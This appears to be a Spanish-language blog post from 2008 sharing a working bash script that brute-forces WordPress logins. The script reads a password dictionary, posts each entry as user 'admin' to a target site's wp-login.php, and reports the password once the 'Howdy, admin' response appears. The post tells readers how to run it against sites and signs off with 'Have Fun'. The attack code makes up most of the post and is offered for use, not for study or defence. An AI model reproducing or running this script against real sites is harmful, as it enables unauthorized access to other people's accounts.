Posteado por: [p3ll3] | septiembre 23, 2008

Cuidado WordPress – wp-bruteforcer

Este es un pequeño script para hacerle fuerza bruta a paginas que usen como motor word-press, lo único que tenemos que hacer es guardarlo en un procesador de textos después darle permisos y por ultimo ejecutarlo. Hay que tomar en cuenta que nos pide un diccionario de passwd, en donde guardemos el pequeño script guardamos también nuestro diccionario de passwrds pero con el siguiente nombre:
bf_passwords [ Yo use el de milw0rm ]


#!/usr/bin/env bash
# wordpress BruteForce v1.0
# coded By 0x90 2008
# 0x90[at]bsdmail.org
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!

echo ".::Wordpress BruteForce By 0×90::."
echo "use a good dictioary rename it to bf_passwords"
echo
echo -n "Enter website with full path to wordpress:
> "
read site

n=`cat bf_passwords | wc -l`
for (( i=1; i <= $n; i++));
do
#default user is admin
password=`sed -n "$i"p bf_passwords`
b=`echo “log=admin&pwd="$password"&wp-submit=Log+In&redirect_to=wp-admin" | lynx -dump -nolist -post_data ""$site"/wp-login.php" | grep -o "Howdy, admin"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit

Visto en: ZerialKiller

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Categorías

A %d blogueros les gusta esto: